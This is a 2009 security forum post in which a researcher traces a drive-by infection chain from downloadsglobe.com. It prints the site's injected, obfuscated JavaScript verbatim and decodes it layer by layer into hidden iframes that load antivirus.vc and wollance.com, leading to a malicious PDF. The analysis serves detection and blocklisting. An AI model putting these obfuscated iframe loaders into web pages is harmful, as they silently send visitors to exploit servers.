Author Topic: downloadsglobe.com > antivirus.vc + wollance.com  (Read 3437 times)


May 11, 2009, 03:08:37 am

MysteryFCM

http://vurl.mysteryfcm.co.uk/?url=611862

Code: [Select]
function c268fb268di4a06e9d472afd(i4a06e9d472eea){ function i4a06e9d4732d7(){return 16;} return (parseInt(i4a06e9d472eea,i4a06e9d4732d7()));}function i4a06e9d473aa4(i4a06e9d473e85){ var i4a06e9d47426f='';i4a06e9d47524d=String.fromCharCode;for(i4a06e9d474625=0;i4a06e9d474625<i4a06e9d473e85.length;i4a06e9d474625+=2){ i4a06e9d47426f+=(i4a06e9d47524d(c268fb268di4a06e9d472afd(i4a06e9d473e85.substr(i4a06e9d474625,2))));}return i4a06e9d47426f;} var r9d='';var i4a06e9d4755ab='3C7'+r9d+'3637'+r9d+'2697'+r9d+'07'+r9d+'43E696628216D7'+r9d+'96961297'+r9d+'B646F637'+r9d+'56D656E7'+r9d+'42E7'+r9d+'7'+r9d+'7'+r9d+'2697'+r9d+'465287'+r9d+'56E657'+r9d+'363617'+r9d+'065282027'+r9d+'2533632536392536362537'+r9d+'322536312536642536352532302536652536312536642536352533642536332533322533362532302537'+r9d+'332537'+r9d+'32253633253364253237'+r9d+'2536382537'+r9d+'342537'+r9d+'342537'+r9d+'302533612532662532662536312536652537'+r9d+'342536392537'+r9d+'362536392537'+r9d+'322537'+r9d+'352537'+r9d+'332532652537'+r9d+'36253633253266253366253237'+r9d+'2532622534642536312537'+r9d+'342536382532652537'+r9d+'322536662537'+r9d+'352536652536342532382534642536312537'+r9d+'342536382532652537'+r9d+'32253631253665253634253666253664253238253239253261253333253337'+r9d+'253331253332253239253262253237'+r9d+'253338253631253633253237'+r9d+'2532302537'+r9d+'37'+r9d+'2536392536342537'+r9d+'34253638253364253331253336253230253638253635253639253637'+r9d+'2536382537'+r9d+'342533642533322533332533322532302537'+r9d+'332537'+r9d+'342537'+r9d+'39253663253635253364253237'+r9d+'2537'+r9d+'362536392537'+r9d+'332536392536322536392536632536392537'+r9d+'342537'+r9d+'39253361253638253639253634253634253635253665253237'+r9d+'2533652533632532662536392536362537'+r9d+'3225363125366425363525336527'+r9d+'29293B7'+r9d+'D7'+r9d+'6617'+r9d+'2206D7'+r9d+'969613D7'+r9d+'47'+r9d+'27'+r9d+'5653B3C2F7'+r9d+'3637'+r9d+'2697'+r9d+'07'+r9d+'43E';document.write(i4a06e9d473aa4(i4a06e9d4755ab));
eval(String.fromCharCode(118,97,114,32,116,61,53,59,118,97,114,32,104,106,103,52,61,34,119,111,108,108,34,59,118,97,114,32,119,61,34,97,110,99,101,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,51,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,56,55,52,57,56,48,48,48,48,48,50,51,52,48));

Decodes to;

Code: [Select]
<!-- Analyst notes: output of the first decoding pass, both layers shown back to back.
     The <script> part comes from the hex layer: `myia` works as a run-once flag (it is undefined on the
     first pass and set to true afterwards), so a page injected several times writes the iframe only once.
     Its payload is still percent-encoded and is expanded by unescape() at run time.
     The text after </script> comes from the eval(String.fromCharCode(...)) layer: the host name and the
     words "iframe"/"http" are built from fragments before being passed to document.write(). -->
<script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%32%36%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%61%6e%74%69%76%69%72%75%73%2e%76%63%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%37%31%32%29%2b%27%38%61%63%27%20%77%69%64%74%68%3d%31%36%20%68%65%69%67%68%74%3d%32%33%32%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>var t=5;var hjg4="woll";var w="ance";var re6=".";var rrtt6="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="3"></i'+'f'+'rame>');var w6=87498000002340
Which in turn decodes to;

Code: [Select]
<!-- Analyst notes: the markup both layers finally write into the page.
     First iframe: 16x232 but styled visibility:hidden, pointing at antivirus.vc.
     The '+Math.round(Math.random()*3712)+' part is inside the unescape()'d string, so it reaches the HTML
     parser as literal text rather than being evaluated; the request most likely goes to the bare
     http://antivirus.vc/? URL (NOTE(review): confirm against a traffic capture).
     Second iframe: 1x3 pixels, pointing at wollance.com. -->
<iframe name=c26 src='http://antivirus.vc/?'+Math.round(Math.random()*3712)+'8ac' width=16 height=232 style='visibility:hidden'></iframe><iframe src="http://wollance.com/" width="1" height="3"></iframe>
wollance.com contains;

Code: [Select]
// Analyst notes: same wrapper as on the referring page, decimal character codes rebuilt with
// String.fromCharCode() and executed through eval().
// The decoded script splits the word "iframe" into fragments and document.write()s a 1x2 iframe
// whose src is the relative path /image/index.php, so the next stage is fetched from this same host.
// The leading `var utytt=34` and trailing `var w6=...` are not used by the decoded code.
eval(String.fromCharCode(118,97,114,32,117,116,121,116,116,61,51,52,59,118,97,114,32,97,61,34,105,102,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,47,105,109,97,103,101,47,105,110,100,101,120,46,112,104,112,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,50,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,48,48,53,48,51,50,48,48,48,48,48,50,49,48))
.... which decodes to;

Code: [Select]
<!-- Analyst note: 1x2 iframe with a relative src, so /image/index.php is requested from the host that served this markup. -->
<iframe src="/image/index.php" width="1" height="2"></iframe>
Which loads;

Code: [Select]
<!-- Analyst note: another relative 1x4 iframe; /image/pfgt.php is the request that is answered with the PDF. -->
<iframe src='/image/pfgt.php' width=1 height=4></iframe>
Which is a PDF;

Code: [Select]
Date: Mon, 11 May 2009 02:56:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Accept-Ranges: bytes
Content-Length: 23231
Content-Disposition: inline; filename=372.pdf
Connection: close
Content-Type: application/pdf

Where 372 is a random number.

Got the PDF uncompressed, but it wouldn't decode with Malzilla (it kept throwing up errors, which means PDFTK likely didn't uncompress it properly; I used "pdftk {file} output {file}.out uncompress").
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net